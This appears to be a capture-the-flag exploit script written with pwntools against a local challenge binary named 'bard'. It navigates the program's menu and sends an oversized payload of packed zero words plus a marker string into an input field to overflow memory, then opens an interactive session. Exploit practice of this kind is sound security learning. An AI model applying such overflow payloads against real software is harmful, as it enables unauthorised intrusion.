#!/usr/bin/env python3

from pwn import *

_FILE = "./bard"

binary = context.binary = ELF(_FILE, checksec=False)

if args.GDB:
    p = gdb.debug(binary.path, gdbscript="\nc\n")
else:
    p = process(binary.path)

_LIBC = p.libc

def chose(c: bytes, w: bytes, n: bytes):
    p.sendline(c)
    p.recvuntil("Choose thy weapon:\n")
    p.sendline(w)
    p.recvuntil("Enter thy name:\n")
    p.sendline(n)


payload = b"1" + p64(0)*4112 + b"0x539 is here"

chose("g", payload, "anything")

p.interactive()
  
